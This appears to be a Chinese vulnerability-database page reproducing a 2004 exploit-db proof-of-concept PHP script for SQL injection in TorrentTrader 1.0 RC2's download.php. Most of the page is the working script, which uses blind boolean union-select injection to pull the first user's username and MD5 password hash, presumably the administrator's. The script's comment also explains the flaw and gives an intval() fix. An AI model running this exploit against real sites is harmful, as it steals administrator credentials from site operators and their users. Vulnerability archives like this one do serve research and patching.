TorrentTrader 1.0 RC2 – SQL Injection

TorrentTrader 1.0 RC2 – SQL Injection

漏洞ID 1054578 漏洞类型
发布时间 2004-09-01 更新时间 2004-09-01
图片[1]-TorrentTrader 1.0 RC2 – SQL Injection-安全小百科CVE编号 N/A
图片[2]-TorrentTrader 1.0 RC2 – SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/430
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/php 


<? 


/* 


TorrentTrader 1.0 RC2 SQL Injection Proof of Concept 
By aCiDBiTS acidbits_at_hotmail.com 31-August-2004 


"TorrentTrader (http://www.torrenttrader.com/) is a feature packed and 
highly customisable open-source BitTorrent tracker." 


This PoC dumps the username and password's md5 hash of first user in 
TorrentTrader web application database, that should be the administrator. 
First it fetchs a valid torrent id, then it determines if database's user 
can perform "union select" and finally obtains the username and 
md5(password). Tested on TorrentTrader 1.0 RC2, maybe older versions also 
vulnerable. 


Usage (in my debian box): 
php4 -q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade" 



++ Vulnerability description & workaround++ 


There is no user input sanization for parameter "id" in download.php prior 
beeing used in a SQL query. This can be exploited to manipulate SQL queries 
by injecting arbitrary SQL code. A workaround to solve this is to modify 
download.php, line13: 


$res = mysql_query("SELECT filename FROM torrents WHERE id = $id"); 


With: 


$res = mysql_query("SELECT filename FROM torrents WHERE id = 
".intval($id)); 



*/ 



echo "+----------------------------------------------------------+n| 
TorrentTrader 1.0 RC2 SQL Injection Proof of Concept |n| By aCiDBiTS 
acidbits_at_hotmail.com 31-August-2004 
|n+----------------------------------------------------------+nn"; 



if($argc<2) die("Usage: ".$argv[0]." URL_to_TorrentTrader_scriptnn"); 
$host=$argv[1]; 
if(substr($host,strlen($host)-1,1)!='/') $host.='/'; 


echo "[+] Getting valid torrent id ... "; 
$webc=get_web($host); 
$temp=explode("torrents-details.php?id=",$webc); 
$id=intval($temp[1]); 
if( !$id ) die( "Failed!nn"); 
echo "OKn Using Torrent id: $idnn"; 


echo "[+] Checking if injection is possible ... "; 
$bas=$id."%20and%200%20union%20select%201%20from%20users%20where%20"; 
if( test_cond( $bas."1" ) && !test_cond( $bas."0" ) ) echo " OKnn"; else 
die ("nn Failed! nn"); 


echo "[+] Getting username & password ... n Username: "; 
get_field( "username"); 
echo "n MD5(Password): "; 
get_field( "password" ); 


die("nn  /  /n (Oo) Done! (oO)n //||\\ 
//||\\nn"); 



function test_cond( $cond ) 
{ 
global $host; 
$res=get_web( $host."download.php?id=".$cond); 
if( eregi( "The ID has been found on the Database, but the torrent has 
gone!", $res ) ) 
return 1; 
else return 0; 
} 



function get_field( $field ) 
{ 
global $bas; 
$unval= " 0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; 
$idx=1; 
$min=0; 
$max=strlen($unval); 
while($min!=$max) { 
$mid=$min+(($max-$min)/2); 
if( 
test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) 
) { 
$idx++; 
echo substr($unval,$mid,1); 
$min=0; 
$max=strlen($unval); 
if( !test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))") ) 
return; 
} else { 
if( 
test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) 
) $max=$mid; 
else $min=$mid; 
} 
} 
die( "nnUnexpected error!nn"); 
} 



function get_web($url) 
{ 
$ch=curl_init(); 
curl_setopt ($ch, CURLOPT_URL, $url); 
curl_setopt ($ch, CURLOPT_HEADER, 0); 
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1); 
$data=curl_exec ($ch); 
curl_close ($ch); 
return $data; 
} 



/*  / 
(Oo) 
//||\ */ 


?>

# milw0rm.com [2004-09-01]

相关推荐: OpenFTPD Remote Message Format String Vulnerability

OpenFTPD Remote Message Format String Vulnerability 漏洞ID 1098192 漏洞类型 Input Validation Error 发布时间 2004-07-30 更新时间 2004-07-30 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享